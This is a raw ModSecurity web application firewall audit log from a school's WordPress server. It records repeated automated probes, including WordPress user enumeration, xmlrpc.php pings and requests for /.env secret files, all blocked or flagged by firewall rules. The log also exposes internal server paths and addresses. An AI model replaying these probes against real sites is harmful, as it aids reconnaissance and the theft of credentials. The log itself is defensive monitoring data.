userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746348392160854 4592 (- - -) Stopwatch2: 1746348392160854 4592; combined=3621, p1=466, p2=2954, p3=23, p4=24, p5=90, sr=67, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7dac10-Z-- --9627311e-A-- [04/May/2025:16:27:49 +0700] aBczFWJEE9ao5dcyYWn3PgAAAIY 103.236.140.4 59126 103.236.140.4 8181 --9627311e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9627311e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9627311e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746350869498212 3284 (- - -) Stopwatch2: 1746350869498212 3284; combined=1417, p1=460, p2=925, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9627311e-Z-- --fd413139-A-- [04/May/2025:16:27:56 +0700] aBczHGJEE9ao5dcyYWn3QAAAAJg 103.236.140.4 59130 103.236.140.4 8181 --fd413139-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd413139-C-- demo.sayHello --fd413139-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd413139-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746350876272572 5560 (- - -) Stopwatch2: 1746350876272572 5560; combined=4342, p1=464, p2=3642, p3=39, p4=42, p5=91, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd413139-Z-- --b68c9554-A-- [04/May/2025:16:36:15 +0700] aBc1D2JEE9ao5dcyYWn3RAAAAI4 103.236.140.4 59172 103.236.140.4 8181 --b68c9554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.80 Safari/537.36 Accept-Charset: utf-8 --b68c9554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b68c9554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746351375991635 874 (- - -) Stopwatch2: 1746351375991635 874; combined=324, p1=289, p2=0, p3=0, p4=0, p5=34, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b68c9554-Z-- --acbd083e-A-- [04/May/2025:16:38:24 +0700] aBc1kPnZiHJYHUAF8QfkEQAAAA0 103.236.140.4 59192 103.236.140.4 8181 --acbd083e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.212.77 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.212.77 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --acbd083e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acbd083e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746351504783803 831 (- - -) Stopwatch2: 1746351504783803 831; combined=346, p1=307, p2=0, p3=0, p4=0, p5=39, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acbd083e-Z-- --82615417-A-- [04/May/2025:16:45:07 +0700] aBc3I-chPF6irSergtsBlwAAAMo 103.236.140.4 59232 103.236.140.4 8181 --82615417-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82615417-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82615417-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351907762301 3220 (- - -) Stopwatch2: 1746351907762301 3220; combined=1326, p1=445, p2=841, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82615417-Z-- --1629e846-A-- [04/May/2025:16:45:16 +0700] aBc3LOchPF6irSergtsBmgAAAMk 103.236.140.4 59244 103.236.140.4 8181 --1629e846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1629e846-C-- demo.sayHello --1629e846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1629e846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351916562878 6503 (- - -) Stopwatch2: 1746351916562878 6503; combined=4717, p1=630, p2=3845, p3=41, p4=43, p5=95, sr=104, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1629e846-Z-- --8ee9160b-A-- [04/May/2025:16:45:20 +0700] aBc3MPnZiHJYHUAF8QfkEwAAABc 103.236.140.4 59246 103.236.140.4 8181 --8ee9160b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ee9160b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee9160b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351920375052 2661 (- - -) Stopwatch2: 1746351920375052 2661; combined=1191, p1=437, p2=724, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee9160b-Z-- --680ebb4b-A-- [04/May/2025:16:45:24 +0700] aBc3NOchPF6irSergtsBnQAAANM 103.236.140.4 59252 103.236.140.4 8181 --680ebb4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --680ebb4b-C-- demo.sayHello --680ebb4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --680ebb4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351924733624 4691 (- - -) Stopwatch2: 1746351924733624 4691; combined=3612, p1=454, p2=2950, p3=21, p4=23, p5=95, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --680ebb4b-Z-- --5f17962e-A-- [04/May/2025:16:45:52 +0700] aBc3UOchPF6irSergtsBngAAAM8 103.236.140.4 59258 103.236.140.4 8181 --5f17962e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f17962e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f17962e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746351952488872 3148 (- - -) Stopwatch2: 1746351952488872 3148; combined=1373, p1=517, p2=826, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f17962e-Z-- --58767b64-A-- [04/May/2025:16:46:01 +0700] aBc3WechPF6irSergtsBnwAAANE 103.236.140.4 59262 103.236.140.4 8181 --58767b64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58767b64-C-- demo.sayHello --58767b64-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58767b64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746351961885092 6580 (- - -) Stopwatch2: 1746351961885092 6580; combined=4828, p1=626, p2=3959, p3=37, p4=41, p5=99, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58767b64-Z-- --1789df6e-A-- [04/May/2025:16:47:14 +0700] aBc3ouchPF6irSergtsBogAAAME 103.236.140.4 59274 103.236.140.4 8181 --1789df6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1789df6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1789df6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352034798929 3291 (- - -) Stopwatch2: 1746352034798929 3291; combined=1485, p1=493, p2=960, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1789df6e-Z-- --7c3b8111-A-- [04/May/2025:16:47:19 +0700] aBc3p-chPF6irSergtsBpAAAANA 103.236.140.4 59278 103.236.140.4 8181 --7c3b8111-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c3b8111-C-- demo.sayHello --7c3b8111-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c3b8111-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352039293219 4269 (- - -) Stopwatch2: 1746352039293219 4269; combined=2945, p1=370, p2=2414, p3=22, p4=25, p5=67, sr=53, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c3b8111-Z-- --f5423e77-A-- [04/May/2025:16:52:41 +0700] aBc46echPF6irSergtsBrQAAANM 103.236.140.4 59326 103.236.140.4 8181 --f5423e77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f5423e77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5423e77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352361064658 3140 (- - -) Stopwatch2: 1746352361064658 3140; combined=1318, p1=454, p2=829, p3=0, p4=0, p5=35, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5423e77-Z-- --2152815c-A-- [04/May/2025:16:52:48 +0700] aBc48PnZiHJYHUAF8QfkGQAAABg 103.236.140.4 59330 103.236.140.4 8181 --2152815c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2152815c-C-- demo.sayHello --2152815c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2152815c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352368321977 4992 (- - -) Stopwatch2: 1746352368321977 4992; combined=3815, p1=431, p2=3164, p3=28, p4=31, p5=93, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2152815c-Z-- --3033255f-A-- [04/May/2025:16:54:08 +0700] aBc5QOchPF6irSergtsBrwAAANY 103.236.140.4 59346 103.236.140.4 8181 --3033255f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3033255f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3033255f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746352448126157 3366 (- - -) Stopwatch2: 1746352448126157 3366; combined=1439, p1=455, p2=939, p3=0, p4=0, p5=45, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3033255f-Z-- --363e1a70-A-- [04/May/2025:16:54:16 +0700] aBc5SOchPF6irSergtsBsAAAANI 103.236.140.4 59350 103.236.140.4 8181 --363e1a70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.190 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --363e1a70-C-- demo.sayHello --363e1a70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --363e1a70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746352456640840 6140 (- - -) Stopwatch2: 1746352456640840 6140; combined=4401, p1=623, p2=3547, p3=32, p4=35, p5=96, sr=124, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --363e1a70-Z-- --6f8a0c0a-A-- [04/May/2025:17:16:00 +0700] aBc-YPnZiHJYHUAF8QfkJQAAABQ 103.236.140.4 59486 103.236.140.4 8181 --6f8a0c0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 Accept-Charset: utf-8 --6f8a0c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f8a0c0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746353760685714 892 (- - -) Stopwatch2: 1746353760685714 892; combined=392, p1=292, p2=0, p3=0, p4=0, p5=100, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
